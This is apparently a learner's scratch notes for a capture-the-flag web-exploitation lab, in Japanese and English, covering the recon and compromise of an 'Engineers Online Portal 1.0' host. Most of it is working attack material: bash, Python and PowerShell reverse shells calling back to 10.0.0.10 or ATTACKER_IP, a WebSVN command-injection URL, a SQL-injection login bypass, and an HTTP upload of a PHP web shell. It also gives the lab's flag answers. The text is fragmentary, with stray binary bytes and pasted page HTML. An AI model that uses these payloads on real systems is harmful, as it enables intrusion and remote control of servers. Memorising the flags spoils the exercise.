<div id="revjump"><form method="get" action="" id="revision"><input type="hidden" name="repname" value="FirstRepo" />Rev <input type="text" size="5" name="rev" placeholder="HEAD" /><span class="submit"><input type="submit" value="Go" /></span></form></div>
<p>
	<span class="listing"><a href="listing.php?repname=FirstRepo&amp;path=%2F&amp;#a6666cd76f96956469e7be39d750cc7d9">Directory listing</a></span> &#124;
	<span class="log"><a href="log.php?repname=FirstRepo&amp;path=%2F&amp;&amp;isdir=1">View Log</a></span>
    &#124; <span class="feed"><a href="rss.php?repname=FirstRepo&amp;path=%2F&amp;">RSS feed</a></span>
</p>

<div id="info">
<h2>Last modification</h2>
  <ul>
    <li>Rev 0 &ndash; <span title="?date?">?age?</span></li>
    <li><strong>Author:</strong> ?author?</li>
    <li><dl><dt><strong>Log message:</strong></dt><dd>?log?</dd></dl></li>
  </ul>
</div>

<div id="wrap">
   <table>
      <thead>
      <tr align="left" valign="middle">
        <th scope="col" class="path">Path</th>
        <th scope="col">Blame</th>
        <th scope="col">Diff</th>
        <th scope="col">Log</th>
      </tr>
      </thead>
      <tbody>
    </tbody>

   </table>
</div>
</div>
<div id="footer">
  <p style="padding:0; margin:0"><small>Powered by <a href="https://websvnphp.github.io/">WebSVN</a> 2.6.0 and <a href="http://subversion.apache.org">Apache Subversion</a> 1.13.0 &nbsp; &nbsp; &#x2713; <a href="http://validator.w3.org/check?uri=http://10.0.0.15/revision.php?repname=FirstRepo%26rev=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23%26template=%26language=en">XHTML</a> &amp; <a href="http://jigsaw.w3.org/css-validator/validator?uri=http://10.0.0.15/revision.php?repname=FirstRepo%26rev=%3B+bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.10%2F4444+0%3E%261+%3B%23%26template=%26language=en">CSS</a></small></p>
</div>
</body>
</html>
user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ 

; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' ;#

%3B+python3+-c+%27import+socket%2Cos%2Cpty%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.0.0.10%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bpty.spawn%28%22%2Fbin%2Fbash%22%29%27+%3B%23

このエクスプロイトを使用するには、
まずダウンロードし、ペイロードセクション
のIPアドレスを10.0.0.10に変更します。
次に、コマンドnc -lvnp 4444を使用して、
シェルを受信するリスナーを設定します。
次に、python3 50042.py http://10.0.0.15を
実行してエクスプロイトを実行します。
これにより、被害者に対してシェルが
利用可能になります。
フラグを確認するには、
コマンドcat ../flag.txtを実行します。
フラグは3ec876295e3198db911e90be2006f6a7
と表示されます。


https://www.exploit-db.com/download/50042


This exercise is intended to help you practice implementing and understanding exploits.
This exercise is meant to help you practice web attacks and gaining access via different exploits. The target is located at: 10.0.0.15, What is the full name and the version of the vulnerable web application?


この演習は、エクスプロイトの実装と理解を
練習することを目的としています。

この演習は、Web攻撃と様々なエクスプロイト
によるアクセス取得の練習を目的としています。
ターゲットは10.0.0.15です。
脆弱なWebアプリケーションのフルネームと
バージョンは何ですか？


nmap を使用してネットワークをマップし、
ターゲット マシン上の Web サイト 
ポートを見つけます。

user@ip-10-0-0-10:~$ nmap -sV -p- 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-21 10:51 UTC
Nmap scan report for 10.0.0.15
Host is up (0.00046s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.2.0)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.2.0)
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql         MariaDB (unauthorized)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 388.02 seconds
user@ip-10-0-0-10:~$ 

user@ip-10-0-0-10:~$ nmap -A 10.0.0.15
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-21 11:01 UTC
Nmap scan report for 10.0.0.15
Host is up (0.00044s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.2.0)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
|_http-title: NIA Project Monitoring System
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.2.0)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
|_http-title: NIA Project Monitoring System
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MariaDB (unauthorized)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: EC2AMAZ-8RL9EPE
|   NetBIOS_Domain_Name: EC2AMAZ-8RL9EPE
|   NetBIOS_Computer_Name: EC2AMAZ-8RL9EPE
|   DNS_Domain_Name: EC2AMAZ-8RL9EPE
|   DNS_Computer_Name: EC2AMAZ-8RL9EPE
|   Product_Version: 10.0.17763
|_  System_Time: 2025-10-21T11:01:27+00:00
| ssl-cert: Subject: commonName=EC2AMAZ-8RL9EPE
| Not valid before: 2025-10-20T10:46:03
|_Not valid after:  2026-04-21T10:46:03
|_ssl-date: 2025-10-21T11:01:32+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: EC2AMAZ-8RL9EPE, NetBIOS user: <unknown>, NetBIOS MAC: 06:a5:80:34:ff:93 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-10-21T11:01:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds
user@ip-10-0-0-10:~$ 

user@ip-10-0-0-10:~$ 
user@ip-10-0-0-10:~$ curl -s -I http://10.0.0.15
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2025 11:04:06 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
X-Powered-By: PHP/8.2.0
Content-Type: text/html; charset=UTF-8

user@ip-10-0-0-10:~$ 


NIA Project Monitoring System

ログオンページにアクセスすると、
「エンジニアポータル」
という文字が表示されます。


完全な名前を取得するには、
次のエクスプロイトを検索
してください: 
Engineers Online Portal


H}@!¸vöêÆâ¬<~Þ"9
õÿ\$R}»AËÝáÓ


H}@!¸vöêÆâ¬<~Þ"9
õÿ\$R}»AËÝáÓ

<body>
		<div class="navbar navbar-fixed-top navbar-inverse">
        <div class="navbar-inner">
            <div class="container-fluid">
                <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span>
					<span class="icon-bar"></span><span class="icon-bar"></span>
                </a>
                <a class="brand" href="#">Welcome to: NIA Munoz, Nueva Ecija Engineer Online Portal</a>
					<div class="nav-collapse collapse">
						<ul class="nav pull-right">
														<li class="dropdown">
								<a href="#" role="button" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-user icon-large"></i>NIA Division Office CLSU Compound, Science City of Munoz <i class="caret"></i></a>
									<ul class="dropdown-menu">
										<li><a tabindex="-1" href="change_password_student.php"><i class="icon-circle"></i> Change Password</a></li>
										<li><a tabindex="-1" href="#myModal_student" data-toggle="modal"><i class="icon-picture"></i> Change Avatar</a></li>
										<li class="divider"></li>
										<li>
											<a tabindex="-1" href="logout.php"><i class="icon-signout"></i>&nbsp;Logout</a>
										</li>
									</ul>
							</li>
						</ul>
					</div>
            </div>
        </div>
</div>
		<!-- Modal -->
<div id="myModal_student" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
	<div class="modal-header">
		<button type="button" class="close" data-dismiss="modal" aria-hidden="true">x</button>
		<h3 id="myModalLabel">Change Avatar</h3>
	</div>
		<div class="modal-body">
					<form method="post" action="student_avatar.php" enctype="multipart/form-data">
							<center>	
								<div class="control-group">
								<div class="controls">
									<div class="uploader" id="uniform-fileInput"><input name="image" class="input-file uniform_on" id="fileInput" type="file" required=""><span class="filename" style="user-select: none;">No file selected</span><span class="action" style="user-select: none;">Choose File</span></div>
								</div>
								</div>
							</center>			
					
		</form></div>
	<div class="modal-footer">
		<button class="btn" data-dismiss="modal" aria-hidden="true"><i class="icon-remove icon-large"></i> Close</button>
		<button class="btn btn-info" name="change"><i class="icon-save icon-large"></i> Save</button>
	</div>
					
</div>	        <div class="container-fluid">
            <div class="row-fluid">
				<div class="span3" id="sidebar">
		<img id="avatar" class="img-polaroid" src="admin/uploads/NIA.png">
											
	 														
							<ul class="nav nav-list bs-docs-sidenav nav-collapse collapse">
			<li class=""><a href="dashboard_student.php"><i class="icon-chevron-right"></i><i class="icon-group"></i>&nbsp;List of Engineers</a></li>
			<li class="active">
				<a href="student_notification.php"><i class="icon-chevron-right"></i><i class="icon-info-sign"></i>&nbsp;Notification
								</a>
			</li>
						<li class="">
			<a href="student_message.php"><i class="icon-chevron-right"></i><i class="icon-envelope-alt"></i>&nbsp;Message
									<span class="badge badge-important">1</span>
							</a>
			</li>
			
		</ul>
			
</div>

                <div class="span9" id="content">
                     <div class="row-fluid">
					
					 
				
					 
                        <!-- block -->
                        <div id="block_bg" class="block">
                            <div class="navbar navbar-inner block-header">
                                <div id="" class="muted pull-left"></div>
                            </div>
                            <div class="block-content collapse in">
                                <div class="span12">
							
						
  					<form action="read.php" method="post">
										
														<div class="post" id="del24">
											
											<strong>Rustom Hipolito</strong>
											Add Downloadable Materials file name <b>Guimba Irrigation Report</b> In 
											<a href="downloadable_student.php?id=189">
											NIA-0001 
											NIA CLSU Compound, Science City of Munoz 
									 
											</a>
										<hr>
										<div class="pull-right">
										<i class="icon-calendar"></i>&nbsp;2019-03-02 09:22:30 
										</div>
											
									
											
											</div>
														<div class="post" id="del23">
											
											<strong>Ralph Escoto</strong>
											Add Downloadable Materials file name <b>Partial Report</b> In 
											<a href="downloadable_student.php?id=191">
											NIA-0001 
											NIA CLSU Compound, Science City of Munoz 
									 
											</a>
										<hr>
										<div class="pull-right">
										<i class="icon-calendar"></i>&nbsp;2019-03-02 03:42:31 
										</div>
											
									
											
											</div>
														<div class="post" id="del22">
											
											<strong>Rustom Hipolito</strong>
											Add Downloadable Materials file name <b>Partial Project Report</b> In 
											<a href="downloadable_student.php?id=189">
											NIA-0001 
											NIA CLSU Compound, Science City of Munoz 
									 
											</a>
										<hr>
										<div class="pull-right">
										<i class="icon-calendar"></i>&nbsp;2019-03-02 03:28:46 
										</div>
											
									
											
											</div>
										
					</form>
						
                                </div>
                            </div>
                        </div>
                        <!-- /block -->
                    </div>


                </div>
			
            </div>
		<center>
		<footer>
		
		<p>National Irrigation Administration Copyright 2019</p>
			<p>Programmed by: Team RRJ</p>
		</footer>
</center>

        </div>
		        <script src="admin/bootstrap/js/bootstrap.min.js"></script>
        <script src="admin/vendors/easypiechart/jquery.easy-pie-chart.js"></script>
        <script src="admin/assets/scripts.js"></script>
				<script>
				$(function() {
					// Easy pie charts
					$('.chart').easyPieChart({animate: 1000});
				});
				</script>
			<!-- data table -->
		<script src="admin/vendors/datatables/js/jquery.dataTables.min.js"></script>
        <script src="admin/assets/DT_bootstrap.js"></script>		
			<!-- jgrowl -->
		<script src="admin/vendors/jGrowl/jquery.jgrowl.js"></script>   
				<script>
				$(function() {
					$('.tooltip').tooltip();	
					$('.tooltip-left').tooltip({ placement: 'left' });	
					$('.tooltip-right').tooltip({ placement: 'right' });	
					$('.tooltip-top').tooltip({ placement: 'top' });	
					$('.tooltip-bottom').tooltip({ placement: 'bottom' });
					$('.popover-left').popover({placement: 'left', trigger: 'hover'});
					$('.popover-right').popover({placement: 'right', trigger: 'hover'});
					$('.popover-top').popover({placement: 'top', trigger: 'hover'});
					$('.popover-bottom').popover({placement: 'bottom', trigger: 'hover'});
					$('.notification').click(function() {
						var $id = $(this).attr('id');
						switch($id) {
							case 'notification-sticky':
								$.jGrowl("Stick this!", { sticky: true });
							break;
							case 'notification-header':
								$.jGrowl("A message with a header", { header: 'Important' });
							break;
							default:
								$.jGrowl("Hello world!");
							break;
						}
					});
				});
				</script>
			<link href="admin/vendors/datepicker.css" rel="stylesheet" media="screen">
			<link href="admin/vendors/uniform.default.css" rel="stylesheet" media="screen">
			<link href="admin/vendors/chosen.min.css" rel="stylesheet" media="screen">
		<!--  -->
		<script src="admin/vendors/jquery.uniform.min.js"></script>
        <script src="admin/vendors/chosen.jquery.min.js"></script>
        <script src="admin/vendors/bootstrap-datepicker.js"></script>
		<!--  -->
			<script src="admin/vendors/bootstrap-wysihtml5/lib/js/wysihtml5-0.3.0.js"></script>
			<script src="admin/vendors/bootstrap-wysihtml5/src/bootstrap-wysihtml5.js"></script>
			<script src="admin/vendors/ckeditor/ckeditor.js"></script>
			<script src="admin/vendors/ckeditor/adapters/jquery.js"></script>
			<script type="text/javascript" src="admin/vendors/tinymce/js/tinymce/tinymce.min.js"></script>
        <script>
        $(function() {
            // Ckeditor standard
            $( 'textarea#ckeditor_standard' ).ckeditor({width:'98%', height: '150px', toolbar: [
				{ name: 'document', items: [ 'Source', '-', 'NewPage', 'Preview', '-', 'Templates' ] },	// Defines toolbar group with name (used to create voice label) and items in 3 subgroups.
				[ 'Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', '-', 'Undo', 'Redo' ],			// Defines toolbar group without name.
				{ name: 'basicstyles', items: [ 'Bold', 'Italic' ] }
			]});
            $( 'textarea#ckeditor_full' ).ckeditor({width:'98%', height: '150px'});
        });
        </script>
		<!-- <script type="text/javascript" src="admin/assets/modernizr.custom.86080.js"></script> -->
		<script src="admin/assets/jquery.hoverdir.js"></script>
		<link rel="stylesheet" type="text/css" href="admin/assets//style.css">
			<script type="text/javascript">
			$(function() {
				$('#da-thumbs > li').hoverdir();
			});
			</script>
			<script src="admin/vendors/fullcalendar/fullcalendar.js"></script>
			<script src="admin/vendors/fullcalendar/gcal.js"></script>
			<link href="admin/vendors/datepicker.css" rel="stylesheet" media="screen">
			<script src="admin/vendors/bootstrap-datepicker.js"></script>
						<script>
						$(function() {
							$(".datepicker").datepicker();
							$(".uniform_on").uniform();
							$(".chzn-select").chosen();
							$('#rootwizard .finish').click(function() {
								alert('Finished!, Starting over!');
								$('#rootwizard').find("a[href*='tab1']").trigger('click');
							});
						});
						</script>    
</body>


Engineers Online Portal 1.0

Engineer Online Portal 1.0

アプリケーション名は、
Welcome to: NIA Munoz, Nueva Ecija Engineer Online Portal
よりNueva Ecija Engineer Online Portal
と想定されるが、解答は違っていた。

発見した Web アプリケーションの 
RCE エクスプロイトの Exploit-DB ID 
は何ですか?

脆弱なサービスを悪用する、
C:\Users\User\Desktop\Flag.txt 
のフラグは何ですか？

まず被害者の Web サーバーに
アクセスする必要がありますが、
認証ログイン ページをバイパス
するにはどうすればよいでしょうか?

ログインページをバイパスするには、
EDB-ID: 50452 を参照してください。

sqli攻撃を試してください。
' または 1=1 #、
このSQLI攻撃により認証を
バイパスできます

Webサーバーにアクセスした後、
ホストシステムへの
シェルアクセスを試みる必要がある。
RCE（リモートコード実行攻撃）
はリバースシェルを取得するのに
非常に有効な手段である。

ヒントを受け取るとスコアに
影響する可能性があります

Webサーバーにアクセスした後、
ホストシステムへのシェルアクセス
を試みる必要がある。
RCE（リモートコード実行攻撃）
はリバースシェルを取得するのに
非常に有効な手段である。


















































First, modify the IP to the IP of your machine. You can use the command ip addr or ifconfig to obtain your machine's IP address.

まず、IP をマシンの IP に変更します。
コマンド ip addr または ifconfig 
を使用して、マシンの IP アドレス
を取得できます。

Exploit the vulnerable service, What is the flag from C:\Users\User\Desktop\Flag.txt
You are going to first have to gain access to the victim's Web-Server, How can you bypass the Authentication login page?
To bypass the login page take a look at EDB-ID: 50452
Try an sqli attack, ' or 1=1 #, this SQLI attack allows you to bypass the Authentication
After accessing the Web-Server, you should now try to gain shell access on the hosts system, RCE's (Remote Code Execution attacks) are a really good way to get a reverse shell

' or 1=1 #

POST /upload_save_student.php HTTP/1.1
Host: 10.0.0.15
Content-Length: 719
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvTqpBXXCdLhtTbl5
Origin: http://10.0.0.15
Referer: http://10.0.0.15/downloadable_student.php?id=189
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=t91q8jpl30uc8jetictj4g2l8c
Connection: close

------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="uploaded_file"; filename="test.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>


------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="id"

219
------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="id_class"

189
------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="name"

test2
------WebKitFormBoundaryvTqpBXXCdLhtTbl5
Content-Disposition: form-data; name="desc"

test2
------WebKitFormBoundaryvTqpBXXCdLhtTbl5--


http://10.0.0.15/uploads/test.php


powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


http://10.0.0.15/downloadable/test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt

http://10.0.0.15/uploads/test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt


http://10.0.0.15/downloadable/test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt

http://10.0.0.15/downloadable/test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt?id=189

http://10.0.0.15/downloadable/test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt

RCEエクスプロイトを実行するには、
シェルをアップロードする方法を
見つける必要がある

RCE エクスプロイトの POC によれば、
ファイルをアップロードして
アバターを変更し、必要に応じて
リバース シェルを実行できます。

http://10.0.0.15/[正しいパス]?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt

http://10.0.0.15/admin/uploads/8492_File_test.php


<br />
<b>Warning</b>:  Undefined array key "cmd" in <b>C:\Users\WebAdmin\xampp\htdocs\admin\uploads\8492_File_test.php</b> on line <b>1</b><br />
<br />
<b>Fatal error</b>:  Uncaught ValueError: system(): Argument #1 ($command) cannot be empty in C:\Users\WebAdmin\xampp\htdocs\admin\uploads\8492_File_test.php:1
Stack trace:
#0 C:\Users\WebAdmin\xampp\htdocs\admin\uploads\8492_File_test.php(1): system('')
#1 {main}
  thrown in <b>C:\Users\WebAdmin\xampp\htdocs\admin\uploads\8492_File_test.php</b> on line <b>1</b><br />


http://10.0.0.15/admin/uploads/8492_File_test.php?cmd=type%20C%3A%5CUsers%5CUser%5CDesktop%5CFlag.txt






























